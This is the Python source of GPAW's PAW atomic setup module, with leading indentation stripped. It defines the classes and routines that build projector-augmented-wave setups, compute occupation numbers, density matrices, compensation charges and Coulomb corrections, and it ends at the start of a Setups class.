text_hash: 363e9d78f9a82bb494b08ef0a636fbd97d2cf0df32094aeb667fd263f326d4d9
---
# -*- coding: utf-8 -*-
# Copyright (C) 2003 CAMP
# Please see the accompanying LICENSE file for further information.
if __name__ == '__main__':
print """\
You are using the wrong setup.py script! This setup.py defines a
Setup class used to hold the atomic data needed for a specific atom.
For building the GPAW code you must use the setup.py distutils script
at the root of the code tree. Just do "cd .." and you will be at the
right place."""
raise SystemExit
import os
import sys
from math import pi, sqrt
import numpy as np
from ase.data import atomic_names, chemical_symbols, atomic_numbers
from gpaw.setup_data import SetupData
from gpaw.basis_data import Basis
from gpaw.gaunt import gaunt as G_LLL, Y_LLv
from gpaw.utilities import unpack, pack
from gpaw.rotation import rotation
from gpaw import extra_parameters
from gpaw.atom.radialgd import AERadialGridDescriptor
from gpaw.xc import XC
def create_setup(symbol, xc='LDA', lmax=0,
type='paw', basis=None, setupdata=None, world=None):
if isinstance(xc, str):
xc = XC(xc)
if setupdata is None:
if type == 'hgh' or type == 'hgh.sc':
lmax = 0
from gpaw.hgh import HGHSetupData, setups, sc_setups
if type == 'hgh.sc':
table = sc_setups
else:
table = setups
parameters = table[symbol]
setupdata = HGHSetupData(parameters)
elif type == 'ah':
from gpaw.ah import AppelbaumHamann
ah = AppelbaumHamann()
ah.build(basis)
return ah
elif type == 'ghost':
from gpaw.lcao.bsse import GhostSetupData
setupdata = GhostSetupData(symbol)
else:
setupdata = SetupData(symbol, xc.get_setup_name(),
type, True,
world=world)
if hasattr(setupdata, 'build'):
return LeanSetup(setupdata.build(xc, lmax, basis))
else:
return setupdata
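# Example usage (an illustrative sketch, not part of the original module):
# building a PAW setup for nitrogen with the PBE functional, following the
# signature of create_setup above. The symbol and functional are chosen
# arbitrarily.
#
#   setup = create_setup('N', xc='PBE')   # returns a LeanSetup instance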
class BaseSetup:
"""Mixin-class for setups.
This makes it possible to inherit the most important methods without
the cumbersome constructor of the ordinary Setup class.
Maybe this class will be removed in the future, or it could be
made a proper base class with attributes and so on."""
def print_info(self, text):
self.data.print_info(text, self)
def get_basis_description(self):
return self.basis.get_description()
def calculate_initial_occupation_numbers(self, magmom, hund, charge,
nspins, f_j=None):
"""If f_j is specified, custom occupation numbers will be used.
Hund rules disabled if so."""
niao = self.niAO
f_si = np.zeros((nspins, niao))
assert (not hund) or f_j is None
if f_j is None:
f_j = self.f_j
f_j = np.array(f_j, float)
l_j = np.array(self.l_j)
def correct_for_charge(f_j, charge, degeneracy_j, use_complete=True):
nj = len(f_j)
# correct for the charge
if charge >= 0:
# reduce the higher levels first
for j in range(nj - 1, -1, -1):
f = f_j[j]
if use_complete or f < degeneracy_j[j]:
c = min(f, charge)
f_j[j] -= c
charge -= c
else:
# add to the lower levels first
for j in range(nj):
f = f_j[j]
l = self.l_j[j]
if use_complete or f > 0:
c = min(degeneracy_j[j] - f, -charge)
f_j[j] += c
charge += c
if charge != 0:
correct_for_charge(f_j, charge, degeneracy_j, True)
# distribute the charge to the radial orbitals
if nspins == 1:
assert magmom == 0.0
f_sj = np.array([f_j])
correct_for_charge(f_sj[0], charge,
2 * (2 * l_j + 1))
else:
nval = f_j.sum() - charge
f_sj = 0.5 * np.array([f_j, f_j])
nup = 0.5 * (nval + magmom)
ndown = 0.5 * (nval - magmom)
correct_for_charge(f_sj[0], f_sj[0].sum() - nup,
2 * l_j + 1, False)
correct_for_charge(f_sj[1], f_sj[1].sum() - ndown,
2 * l_j + 1, False)
# Projector function indices:
nj = len(self.n_j)
# distribute to the atomic wave functions
i = 0
j = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
# Skip projector functions not in basis set:
while j < nj and self.l_j[j] != l:
j += 1
if j < nj:
f = f_j[j]
f_s = f_sj[:, j]
else:
f = 0
f_s = np.array([0, 0])
degeneracy = 2 * l + 1
if hund:
# Use Hund's rules:
#assert f == int(f)
f = int(f)
f_si[0, i:i + min(f, degeneracy)] = 1.0 # spin up
f_si[1, i:i + max(f - degeneracy, 0)] = 1.0 # spin down
if f < degeneracy:
magmom -= f
else:
magmom -= 2 * degeneracy - f
else:
for s in range(nspins):
f_si[s, i:i + degeneracy] = f_s[s] / degeneracy
i += degeneracy
j += 1
if hund and magmom != 0:
raise ValueError('Bad magnetic moment %g for %s atom!'
% (magmom, self.symbol))
assert i == niao
# print "fsi=", f_si
return f_si
def get_hunds_rule_moment(self, charge=0):
for M in range(10):
try:
self.calculate_initial_occupation_numbers(M, True, charge, 2)
except ValueError:
pass
else:
return M
raise RuntimeError
def initialize_density_matrix(self, f_si):
nspins, niao = f_si.shape
ni = self.ni
D_sii = np.zeros((nspins, ni, ni))
D_sp = np.zeros((nspins, ni * (ni + 1) // 2))
nj = len(self.n_j)
j = 0
i = 0
ib = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
# Skip projector functions not in basis set:
while j < nj and self.l_j[j] != l:
i += 2 * self.l_j[j] + 1
j += 1
if j == nj:
break
for m in range(2 * l + 1):
D_sii[:, i + m, i + m] = f_si[:, ib + m]
j += 1
i += 2 * l + 1
ib += 2 * l + 1
for s in range(nspins):
D_sp[s] = pack(D_sii[s])
return D_sp
def symmetrize(self, a, D_aii, map_sa):
D_ii = np.zeros((self.ni, self.ni))
for s, R_ii in enumerate(self.R_sii):
D_ii += np.dot(R_ii, np.dot(D_aii[map_sa[s][a]],
np.transpose(R_ii)))
return D_ii / len(map_sa)
def calculate_rotations(self, R_slmm):
nsym = len(R_slmm)
self.R_sii = np.zeros((nsym, self.ni, self.ni))
i1 = 0
for l in self.l_j:
i2 = i1 + 2 * l + 1
for s, R_lmm in enumerate(R_slmm):
self.R_sii[s, i1:i2, i1:i2] = R_lmm[l]
i1 = i2
def get_partial_waves(self):
"""Return spline representation of partial waves and densities."""
l_j = self.l_j
nj = len(l_j)
# cutoffs
rcut2 = 2 * max(self.rcut_j)
gcut2 = self.rgd.ceil(rcut2)
data = self.data
# Construct splines:
nc_g = data.nc_g.copy()
nct_g = data.nct_g.copy()
tauc_g = data.tauc_g
tauct_g = data.tauct_g
#nc_g[gcut2:] = nct_g[gcut2:] = 0.0
nc = self.rgd.spline(nc_g, rcut2, points=1000)
nct = self.rgd.spline(nct_g, rcut2, points=1000)
if tauc_g is None:
tauc_g = np.zeros(nct_g.shape)
tauct_g = tauc_g
tauc = self.rgd.spline(tauc_g, rcut2, points=1000)
tauct = self.rgd.spline(tauct_g, rcut2, points=1000)
phi_j = []
phit_j = []
for j, (phi_g, phit_g) in enumerate(zip(data.phi_jg, data.phit_jg)):
l = l_j[j]
phi_g = phi_g.copy()
phit_g = phit_g.copy()
phi_g[gcut2:] = phit_g[gcut2:] = 0.0
phi_j.append(self.rgd.spline(phi_g, rcut2, l, points=100))
phit_j.append(self.rgd.spline(phit_g, rcut2, l, points=100))
return phi_j, phit_j, nc, nct, tauc, tauct
def set_hubbard_u(self, U, l, scale=1, store=0, LinRes=0):
"""Set Hubbard parameter.
U is in atomic units; l is the orbital to which we wish to
add a Hubbard potential, and scale enables or disables the
scaling of the overlap between the l orbitals. If scale is true,
we enforce <p|p>=1.
"""
self.HubLinRes = LinRes
self.Hubs = scale
self.HubStore = store
self.HubOcc = []
self.HubU = U
self.Hubl = l
self.Hubi = 0
for ll in self.l_j:
if ll == self.Hubl:
break
self.Hubi = self.Hubi + 2 * ll + 1
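# Example usage (hypothetical values, for illustration only): add a Hubbard
# potential of U = 0.18 Ha to the l = 2 (d) orbitals of this setup, with
# overlap scaling enabled.
#
#   setup.set_hubbard_u(0.18, 2, scale=1)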
def four_phi_integrals(self):
"""Calculate four-phi integral.
Calculate the integral over the product of four all electron
functions in the augmentation sphere, i.e.::
/
| d vr ( phi_i1 phi_i2 phi_i3 phi_i4
/ - phit_i1 phit_i2 phit_i3 phit_i4 ),
where phi_i1 is an all electron function and phit_i1 is its
smooth partner.
"""
if hasattr(self, 'I4_pp'):
return self.I4_pp
# radial grid
ng = self.ng
g = np.arange(ng, dtype=float)
r2dr_g = self.rgd.r_g**2 * self.rgd.dr_g
phi_jg = self.data.phi_jg
phit_jg = self.data.phit_jg
# compute radial parts
nj = len(self.l_j)
R_jjjj = np.empty((nj, nj, nj, nj))
for j1 in range(nj):
for j2 in range(nj):
for j3 in range(nj):
for j4 in range(nj):
R_jjjj[j1, j2, j3, j4] = np.dot(r2dr_g,
phi_jg[j1] * phi_jg[j2] * phi_jg[j3] * phi_jg[j4] -
phit_jg[j1] * phit_jg[j2] * phit_jg[j3] * phit_jg[j4])
# prepare for angular parts
L_i = []
j_i = []
for j, l in enumerate(self.l_j):
for m in range(2 * l + 1):
L_i.append(l**2 + m)
j_i.append(j)
ni = len(L_i)
# j_i is the list of j values
# L_i is the list of L (=l**2+m for 0<=m<2*l+1) values
# https://wiki.fysik.dtu.dk/gpaw/devel/overview.html
# calculate the integrals
_np = ni * (ni + 1) // 2 # length for packing
self.I4_pp = np.empty((_np, _np))
p1 = 0
for i1 in range(ni):
L1 = L_i[i1]
j1 = j_i[i1]
for i2 in range(i1, ni):
L2 = L_i[i2]
j2 = j_i[i2]
p2 = 0
for i3 in range(ni):
L3 = L_i[i3]
j3 = j_i[i3]
for i4 in range(i3, ni):
L4 = L_i[i4]
j4 = j_i[i4]
self.I4_pp[p1, p2] = (np.dot(G_LLL[L1, L2],
G_LLL[L3, L4]) *
R_jjjj[j1, j2, j3, j4])
p2 += 1
p1 += 1
# To unpack into I4_iip do:
# from gpaw.utilities import unpack
# I4_iip = np.empty((ni, ni, _np)):
# for p in range(_np):
# I4_iip[..., p] = unpack(I4_pp[:, p])
return self.I4_pp
class LeanSetup(BaseSetup):
"""Setup class with minimal attribute set.
A setup-like class must define at least the attributes of this
class in order to function in a calculation."""
def __init__(self, s):
"""Copies precisely the necessary attributes of the Setup s."""
# R_sii and HubU can be changed dynamically (which is ugly)
self.R_sii = None # rotations, initialized when doing sym. reductions
self.HubU = s.HubU # XXX probably None
self.lq = s.lq # Required for LDA+U I think.
self.type = s.type # required for writing to file
self.fingerprint = s.fingerprint # also req. for writing
self.filename = s.filename
self.symbol = s.symbol
self.Z = s.Z
self.Nv = s.Nv
self.Nc = s.Nc
self.ni = s.ni
self.niAO = s.niAO # XXX rename to nao
self.pt_j = s.pt_j
self.phit_j = s.phit_j # basis functions
self.Nct = s.Nct
self.nct = s.nct
self.lmax = s.lmax
self.ghat_l = s.ghat_l
self.rcgauss = s.rcgauss
self.vbar = s.vbar
self.Delta_pL = s.Delta_pL
self.Delta0 = s.Delta0
self.E = s.E
self.Kc = s.Kc
self.M = s.M
self.M_p = s.M_p
self.M_pp = s.M_pp
self.K_p = s.K_p
self.MB = s.MB
self.MB_p = s.MB_p
self.dO_ii = s.dO_ii
self.xc_correction = s.xc_correction
# Required to calculate initial occupations
self.f_j = s.f_j
self.n_j = s.n_j
self.l_j = s.l_j
self.nj = len(s.l_j)
self.data = s.data
# Below are things which are not really used all that much,
# i.e. shouldn't generally be necessary. Maybe we can make a system
# involving dictionaries for these "optional" parameters
# Required by print_info
self.rcutfilter = s.rcutfilter
self.rcore = s.rcore
self.basis = s.basis # we don't need niAO if we use this instead
# Can also get rid of the phit_j splines if need be
self.N0_p = s.N0_p # req. by estimate_magnetic_moments
self.nabla_iiv = s.nabla_iiv # req. by lrtddft
# XAS stuff
self.phicorehole_g = s.phicorehole_g # should be optional
if s.phicorehole_g is not None:
self.A_ci = s.A_ci # oscillator strengths
# Required to get all electron density
self.rgd = s.rgd
self.rcut_j = s.rcut_j
self.tauct = s.tauct # required by TPSS, MGGA
self.Delta_Lii = s.Delta_Lii # required with external potential
self.B_ii = s.B_ii # required for exact inverse overlap operator
self.dC_ii = s.dC_ii # required by time-prop tddft with apply_inverse
# Required by exx
self.X_p = s.X_p
self.ExxC = s.ExxC
# Required by electrostatic correction
self.dEH0 = s.dEH0
self.dEH_p = s.dEH_p
# Required by utilities/kspot.py (AllElectronPotential)
self.g_lg = s.g_lg
# Probably empty dictionary, required by GLLB
self.extra_xc_data = s.extra_xc_data
# Required for rtxs
self.T_Lqp = s.T_Lqp
class Setup(BaseSetup):
"""Attributes:
========== =====================================================
Name Description
========== =====================================================
``Z`` Charge
``type`` Type-name of setup (e.g. 'paw')
``symbol`` Chemical element label (e.g. 'Mg')
``xcname`` Name of xc
``data`` Container class for information on the atom, e.g.
Nc, Nv, n_j, l_j, f_j, eps_j, rcut_j.
It defines the radial grid by ng and beta, from which
r_g = beta * arange(ng) / (ng - arange(ng)).
It stores pt_jg, phit_jg, phi_jg, vbar_g
========== =====================================================
Attributes for making PAW corrections
============= ==========================================================
Name Description
============= ==========================================================
``Delta0`` Constant in compensation charge expansion coeff.
``Delta_Lii`` Linear term in compensation charge expansion coeff.
``Delta_pL`` Packed version of ``Delta_Lii``.
``dO_ii`` Overlap coefficients
``B_ii`` Projector function overlaps B_ii = <pt_i | pt_i>
``dC_ii`` Inverse overlap coefficients
``E`` Reference total energy of atom
``M`` Constant correction to Coulomb energy
``M_p`` Linear correction to Coulomb energy
``M_pp`` 2nd order correction to Coulomb energy and Exx energy
``Kc`` Core kinetic energy
``K_p`` Linear correction to kinetic energy
``ExxC`` Core Exx energy
``X_p`` Linear correction to Exx energy
``MB`` Constant correction due to vbar potential
``MB_p`` Linear correction due to vbar potential
``dEH0`` Constant correction due to average electrostatic potential
``dEH_p`` Linear correction due to average electrostatic potential
``I4_iip`` Correction to integrals over 4 all electron wave functions
``Nct`` Analytical integral of the pseudo core density ``nct``
============= ==========================================================
It also has the attribute ``xc_correction`` which is an XCCorrection class
instance capable of calculating the corrections due to the xc functional.
Splines:
========== ============================================
Name Description
========== ============================================
``pt_j`` Projector functions
``phit_j`` Pseudo partial waves
``vbar`` vbar potential
``nct`` Pseudo core density
``ghat_l`` Compensation charge expansion functions
``tauct`` Pseudo core kinetic energy density
========== ============================================
"""
def __init__(self, data, xc, lmax=0, basis=None):
self.type = data.name
self.HubU = None
if not data.is_compatible(xc):
raise ValueError('Cannot use %s setup with %s functional' %
(data.setupname, xc.get_setup_name()))
self.symbol = symbol = data.symbol
self.data = data
self.Nc = data.Nc
self.Nv = data.Nv
self.Z = data.Z
l_j = self.l_j = data.l_j
n_j = self.n_j = data.n_j
self.f_j = data.f_j
self.eps_j = data.eps_j
nj = self.nj = len(l_j)
rcut_j = self.rcut_j = data.rcut_j
self.ExxC = data.ExxC
self.X_p = data.X_p
pt_jg = data.pt_jg
phit_jg = data.phit_jg
phi_jg = data.phi_jg
self.fingerprint = data.fingerprint
self.filename = data.filename
rgd = self.rgd = data.rgd
r_g = rgd.r_g
dr_g = rgd.dr_g
self.lmax = lmax
# Find Fourier-filter cutoff radius:
gcutfilter = data.get_max_projector_cutoff()
self.rcutfilter = rcutfilter = r_g[gcutfilter]
rcutmax = max(rcut_j)
rcut2 = 2 * rcutmax
gcut2 = rgd.ceil(rcut2)
self.gcut2 = gcut2
self.gcutmin = rgd.ceil(min(rcut_j))
ni = 0
i = 0
j = 0
jlL_i = []
for l, n in zip(l_j, n_j):
for m in range(2 * l + 1):
jlL_i.append((j, l, l**2 + m))
i += 1
j += 1
ni = i
self.ni = ni
_np = ni * (ni + 1) // 2
self.nq = nq = nj * (nj + 1) // 2
lcut = max(l_j)
if 2 * lcut < lmax:
lcut = (lmax + 1) // 2
self.lcut = lcut
self.B_ii = self.calculate_projector_overlaps(pt_jg)
self.fcorehole = data.fcorehole
self.lcorehole = data.lcorehole
if data.phicorehole_g is not None:
if self.lcorehole == 0:
self.calculate_oscillator_strengths(phi_jg)
else:
self.A_ci = None
# Construct splines:
self.vbar = rgd.spline(data.vbar_g, rcutfilter)
rcore, nc_g, nct_g, nct = self.construct_core_densities(data)
self.rcore = rcore
self.nct = nct
# Construct splines for core kinetic energy density:
tauct_g = data.tauct_g
if tauct_g is None:
tauct_g = np.zeros(ng)
self.tauct = rgd.spline(tauct_g, self.rcore)
self.pt_j = self.create_projectors(rcutfilter)
if basis is None:
basis = self.create_basis_functions(phit_jg, rcut2, gcut2)
phit_j = basis.tosplines()
self.phit_j = phit_j
self.basis = basis #?
self.niAO = 0
for phit in self.phit_j:
l = phit.get_angular_momentum_number()
self.niAO += 2 * l + 1
rgd2 = self.rgd2 = AERadialGridDescriptor(rgd.a, rgd.b, gcut2)
r_g = rgd2.r_g
dr_g = rgd2.dr_g
phi_jg = np.array([phi_g[:gcut2].copy() for phi_g in phi_jg])
phit_jg = np.array([phit_g[:gcut2].copy() for phit_g in phit_jg])
self.nc_g = nc_g = nc_g[:gcut2].copy()
self.nct_g = nct_g = nct_g[:gcut2].copy()
vbar_g = data.vbar_g[:gcut2].copy()
tauc_g = data.tauc_g[:gcut2].copy()
extra_xc_data = dict(data.extra_xc_data)
# Cut down the GLLB related extra data
for key, item in extra_xc_data.items():
if len(item) == rgd.N:
extra_xc_data[key] = item[:gcut2].copy()
self.extra_xc_data = extra_xc_data
self.phicorehole_g = data.phicorehole_g
if self.phicorehole_g is not None:
self.phicorehole_g = self.phicorehole_g[:gcut2].copy()
T_Lqp = self.calculate_T_Lqp(lcut, nq, _np, nj, jlL_i)
self.T_Lqp = T_Lqp
(g_lg, n_qg, nt_qg, Delta_lq, self.Lmax, self.Delta_pL, Delta0,
self.N0_p) = self.get_compensation_charges(phi_jg, phit_jg, _np,
T_Lqp)
self.Delta0 = Delta0
self.g_lg = g_lg
# Solves the radial poisson equation for density n_g
def H(n_g, l):
return rgd2.poisson(n_g, l) * r_g * dr_g
wnc_g = H(nc_g, l=0)
wnct_g = H(nct_g, l=0)
self.wg_lg = wg_lg = [H(g_lg[l], l) for l in range(lmax + 1)]
wn_lqg = [np.array([H(n_qg[q], l) for q in range(nq)])
for l in range(2 * lcut + 1)]
wnt_lqg = [np.array([H(nt_qg[q], l) for q in range(nq)])
for l in range(2 * lcut + 1)]
rdr_g = r_g * dr_g
dv_g = r_g * rdr_g
A = 0.5 * np.dot(nc_g, wnc_g)
A -= sqrt(4 * pi) * self.Z * np.dot(rdr_g, nc_g)
mct_g = nct_g + Delta0 * g_lg[0]
wmct_g = wnct_g + Delta0 * wg_lg[0]
A -= 0.5 * np.dot(mct_g, wmct_g)
self.M = A
self.MB = -np.dot(dv_g * nct_g, vbar_g)
AB_q = -np.dot(nt_qg, dv_g * vbar_g)
self.MB_p = np.dot(AB_q, T_Lqp[0])
# Correction for average electrostatic potential:
#
# dEH = dEH0 + dot(D_p, dEH_p)
#
self.dEH0 = sqrt(4 * pi) * (wnc_g - wmct_g -
sqrt(4 * pi) * self.Z * r_g * dr_g).sum()
dEh_q = (wn_lqg[0].sum(1) - wnt_lqg[0].sum(1) -
Delta_lq[0] * wg_lg[0].sum())
self.dEH_p = np.dot(dEh_q, T_Lqp[0]) * sqrt(4 * pi)
M_p, M_pp = self.calculate_coulomb_corrections(lcut, n_qg, wn_lqg,
lmax, Delta_lq,
wnt_lqg, g_lg,
wg_lg, nt_qg,
_np, T_Lqp, nc_g,
wnc_g, rdr_g, mct_g,
wmct_g)
self.M_p = M_p
self.M_pp = M_pp
if xc.type == 'GLLB':
if 'core_f' in self.extra_xc_data:
self.wnt_lqg = wnt_lqg
self.wn_lqg = wn_lqg
self.fc_j = self.extra_xc_data['core_f']
self.lc_j = self.extra_xc_data['core_l']
self.njcore = len(self.lc_j)
if self.njcore > 0:
self.uc_jg = self.extra_xc_data['core_states'].reshape(
(self.njcore, -1))
self.uc_jg = self.uc_jg[:, :gcut2]
self.phi_jg = phi_jg
self.Kc = data.e_kinetic_core - data.e_kinetic
self.M -= data.e_electrostatic
self.E = data.e_total
Delta0_ii = unpack(self.Delta_pL[:, 0].copy())
self.dO_ii = data.get_overlap_correction(Delta0_ii)
self.dC_ii = self.get_inverse_overlap_coefficients(self.B_ii,
self.dO_ii)
self.Delta_Lii = np.zeros((ni, ni, self.Lmax)) # XXX index order
for L in range(self.Lmax):
self.Delta_Lii[:, :, L] = unpack(self.Delta_pL[:, L].copy())
self.Nct = data.get_smooth_core_density_integral(Delta0)
self.K_p = data.get_linear_kinetic_correction(T_Lqp[0])
r = 0.02 * rcut2 * np.arange(51, dtype=float)
alpha = data.rcgauss**-2
self.ghat_l = data.get_ghat(lmax, alpha, r, rcut2)#;print 'use g_lg!'
self.rcgauss = data.rcgauss
self.xc_correction = data.get_xc_correction(rgd2, xc, gcut2, lcut)
self.nabla_iiv = self.get_derivative_integrals(rgd2, phi_jg, phit_jg)
def calculate_coulomb_corrections(self, lcut, n_qg, wn_lqg,
lmax, Delta_lq, wnt_lqg,
g_lg, wg_lg, nt_qg, _np, T_Lqp,
nc_g, wnc_g, rdr_g, mct_g, wmct_g):
# Can we reduce the excessive parameter passing?
A_q = 0.5 * (np.dot(wn_lqg[0], nc_g) + np.dot(n_qg, wnc_g))
A_q -= sqrt(4 * pi) * self.Z * np.dot(n_qg, rdr_g)
A_q -= 0.5 * (np.dot(wnt_lqg[0], mct_g) + np.dot(nt_qg, wmct_g))
A_q -= 0.5 * (np.dot(mct_g, wg_lg[0])
+ np.dot(g_lg[0], wmct_g)) * Delta_lq[0]
M_p = np.dot(A_q, T_Lqp[0])
A_lqq = []
for l in range(2 * lcut + 1):
A_qq = 0.5 * np.dot(n_qg, np.transpose(wn_lqg[l]))
A_qq -= 0.5 * np.dot(nt_qg, np.transpose(wnt_lqg[l]))
if l <= lmax:
A_qq -= 0.5 * np.outer(Delta_lq[l],
np.dot(wnt_lqg[l], g_lg[l]))
A_qq -= 0.5 * np.outer(np.dot(nt_qg, wg_lg[l]), Delta_lq[l])
A_qq -= 0.5 * np.dot(g_lg[l], wg_lg[l]) * \
np.outer(Delta_lq[l], Delta_lq[l])
A_lqq.append(A_qq)
M_pp = np.zeros((_np, _np))
L = 0
for l in range(2 * lcut + 1):
for m in range(2 * l + 1):
M_pp += np.dot(np.transpose(T_Lqp[L]),
np.dot(A_lqq[l], T_Lqp[L]))
L += 1
return M_p, M_pp
def create_projectors(self, rcut):
pt_j = []
for j, pt_g in enumerate(self.data.pt_jg):
l = self.l_j[j]
pt_j.append(self.rgd.spline(pt_g, rcut, l))
return pt_j
def get_inverse_overlap_coefficients(self, B_ii, dO_ii):
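# A sketch of the identity used here (my reading, assuming the Woodbury
# matrix identity): with the overlap operator S = 1 + |pt_i> dO_ij <pt_j|
# and projector overlaps B_ij = <pt_i|pt_j>, the inverse takes the form
# S^-1 = 1 + |pt_i> dC_ij <pt_j| with dC = -dO (1 + B dO)^-1, which is
# exactly the matrix returned below.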
ni = len(B_ii)
xO_ii = np.dot(B_ii, dO_ii)
return -np.dot(dO_ii, np.linalg.inv(np.identity(ni) + xO_ii))
def calculate_T_Lqp(self, lcut, nq, _np, nj, jlL_i):
Lcut = (2 * lcut + 1)**2
T_Lqp = np.zeros((Lcut, nq, _np))
p = 0
i1 = 0
for j1, l1, L1 in jlL_i:
for j2, l2, L2 in jlL_i[i1:]:
if j1 < j2:
q = j2 + j1 * nj - j1 * (j1 + 1) // 2
else:
q = j1 + j2 * nj - j2 * (j2 + 1) // 2
T_Lqp[:, q, p] = G_LLL[L1, L2, :Lcut]
p += 1
i1 += 1
return T_Lqp
def calculate_projector_overlaps(self, pt_jg):
"""Compute projector function overlaps B_ii = <pt_i | pt_i>."""
nj = len(pt_jg)
B_jj = np.zeros((nj, nj))
for j1, pt1_g in enumerate(pt_jg):
for j2, pt2_g in enumerate(pt_jg):
B_jj[j1, j2] = self.rgd.integrate(pt1_g * pt2_g) / (4 * pi)
B_ii = np.zeros((self.ni, self.ni))
i1 = 0
for j1, l1 in enumerate(self.l_j):
for m1 in range(2 * l1 + 1):
i2 = 0
for j2, l2 in enumerate(self.l_j):
for m2 in range(2 * l2 + 1):
if l1 == l2 and m1 == m2:
B_ii[i1, i2] = B_jj[j1, j2]
i2 += 1
i1 += 1
return B_ii
def get_compensation_charges(self, phi_jg, phit_jg, _np, T_Lqp):
lmax = self.lmax
gcut2 = self.gcut2
nq = self.nq
g_lg = self.data.create_compensation_charge_functions(lmax)
n_qg = np.zeros((nq, gcut2))
nt_qg = np.zeros((nq, gcut2))
q = 0 # q: common index for j1, j2
for j1 in range(self.nj):
for j2 in range(j1, self.nj):
n_qg[q] = phi_jg[j1] * phi_jg[j2]
nt_qg[q] = phit_jg[j1] * phit_jg[j2]
q += 1
gcutmin = self.gcutmin
r_g = self.rgd2.r_g
dr_g = self.rgd2.dr_g
self.lq = np.dot(n_qg[:, :gcutmin], r_g[:gcutmin]**2 * dr_g[:gcutmin])
Delta_lq = np.zeros((lmax + 1, nq))
for l in range(lmax + 1):
Delta_lq[l] = np.dot(n_qg - nt_qg, r_g**(2 + l) * dr_g)
Lmax = (lmax + 1)**2
Delta_pL = np.zeros((_np, Lmax))
for l in range(lmax + 1):
L = l**2
for m in range(2 * l + 1):
delta_p = np.dot(Delta_lq[l], T_Lqp[L + m])
Delta_pL[:, L + m] = delta_p
Delta0 = np.dot(self.nc_g - self.nct_g,
r_g**2 * dr_g) - self.Z / sqrt(4 * pi)
# Electron density inside augmentation sphere. Used for estimating
# atomic magnetic moment:
rcutmax = max(self.rcut_j)
gcutmax = self.rgd.round(rcutmax)
N0_q = np.dot(n_qg[:, :gcutmax], (r_g**2 * dr_g)[:gcutmax])
N0_p = np.dot(N0_q, T_Lqp[0]) * sqrt(4 * pi)
return (g_lg[:, :gcut2].copy(), n_qg, nt_qg,
Delta_lq, Lmax, Delta_pL, Delta0, N0_p)
def get_derivative_integrals(self, rgd, phi_jg, phit_jg):
"""Calculate PAW-correction matrix elements of nabla.
::
/ _ _ d _ ~ _ d ~ _
| dr [phi (r) -- phi (r) - phi (r) -- phi (r)]
/ 1 dx 2 1 dx 2
and similar for y and z."""
if extra_parameters.get('fprojectors'):
return None
r_g = rgd.r_g
dr_g = rgd.dr_g
nabla_iiv = np.empty((self.ni, self.ni, 3))
i1 = 0
for j1 in range(self.nj):
l1 = self.l_j[j1]
nm1 = 2 * l1 + 1
i2 = 0
for j2 in range(self.nj):
l2 = self.l_j[j2]
nm2 = 2 * l2 + 1
f1f2or = np.dot(phi_jg[j1] * phi_jg[j2] -
phit_jg[j1] * phit_jg[j2], r_g * dr_g)
dphidr_g = np.empty_like(phi_jg[j2])
rgd.derivative(phi_jg[j2], dphidr_g)
dphitdr_g = np.empty_like(phit_jg[j2])
rgd.derivative(phit_jg[j2], dphitdr_g)
f1df2dr = np.dot(phi_jg[j1] * dphidr_g -
phit_jg[j1] * dphitdr_g, r_g**2 * dr_g)
for v in range(3):
Lv = 1 + (v + 2) % 3
nabla_iiv[i1:i1 + nm1, i2:i2 + nm2, v] = (
(4 * pi / 3)**0.5 * (f1df2dr - l2 * f1f2or) *
G_LLL[Lv, l2**2:l2**2 + nm2, l1**2:l1**2 + nm1].T +
f1f2or *
Y_LLv[l1**2:l1**2 + nm1, l2**2:l2**2 + nm2, v])
i2 += nm2
i1 += nm1
return nabla_iiv
def construct_core_densities(self, setupdata):
rcore = self.data.find_core_density_cutoff(setupdata.nc_g)
nct = self.rgd.spline(setupdata.nct_g, rcore)
return rcore, setupdata.nc_g, setupdata.nct_g, nct
def create_basis_functions(self, phit_jg, rcut2, gcut2):
# Cutoff for atomic orbitals used for initial guess:
rcut3 = 8.0 # XXXXX Should depend on the size of the atom!
gcut3 = self.rgd.ceil(rcut3)
# We cut off the wave functions smoothly at rcut3 by the
# following replacement:
#
# /
# | f(r), r < rcut2
# f(r) <- < f(r) - a(r) f(rcut3) - b(r) f'(rcut3), rcut2 < r < rcut3
# | 0, r > rcut3
# \
#
# where a(r) and b(r) are 4. order polynomials:
#
# a(rcut2) = 0, a'(rcut2) = 0, a''(rcut2) = 0,
# a(rcut3) = 1, a'(rcut3) = 0
# b(rcut2) = 0, b'(rcut2) = 0, b''(rcut2) = 0,
# b(rcut3) = 0, b'(rcut3) = 1
#
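        # Quick check of the boundary conditions above (not in the original
        # source): with x = (r - rcut2) / (rcut3 - rcut2),
        #     a(x) = 4 x^3 (1 - 0.75 x) = 4 x^3 - 3 x^4
        # gives a(1) = 4 - 3 = 1, a'(1) = 12 - 12 = 0 and
        # a(0) = a'(0) = a''(0) = 0, while
        #     b(x) = x^3 (x - 1) (rcut3 - rcut2)
        # gives b(1) = 0 and db/dr|_{r=rcut3} = (4 - 3) = 1, since
        # d/dr = (1 / (rcut3 - rcut2)) d/dx.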
r_g = self.rgd.r_g
x = (r_g[gcut2:gcut3] - rcut2) / (rcut3 - rcut2)
a_g = 4 * x**3 * (1 - 0.75 * x)
b_g = x**3 * (x - 1) * (rcut3 - rcut2)
class PartialWaveBasis(Basis): # yuckkk
def __init__(self, symbol, phit_j):
Basis.__init__(self, symbol, 'partial-waves', readxml=False)
self.phit_j = phit_j
def tosplines(self):
return self.phit_j
def get_description(self):
template = 'Using partial waves for %s as LCAO basis'
string = template % self.symbol
return string
phit_j = []
for j, phit_g in enumerate(phit_jg):
if self.n_j[j] > 0:
l = self.l_j[j]
phit = phit_g[gcut3]
dphitdr = ((phit - phit_g[gcut3 - 1]) /
(r_g[gcut3] - r_g[gcut3 - 1]))
phit_g[gcut2:gcut3] -= phit * a_g + dphitdr * b_g
phit_g[gcut3:] = 0.0
phit_j.append(self.rgd.spline(phit_g, rcut3, l, points=100))
basis = PartialWaveBasis(self.symbol, phit_j)
return basis
def calculate_oscillator_strengths(self, phi_jg):
# XXX implement oscillator strengths for lcorehole != 0
assert(self.lcorehole == 0)
self.A_ci = np.zeros((3, self.ni))
nj = len(phi_jg)
i = 0
for j in range(nj):
l = self.l_j[j]
if l == 1:
a = self.rgd.integrate(phi_jg[j] * self.data.phicorehole_g,
n=1) / (4 * pi)
for m in range(3):
c = (m + 1) % 3
self.A_ci[c, i] = a
i += 1
else:
i += 2 * l + 1
assert i == self.ni
class Setups(list):
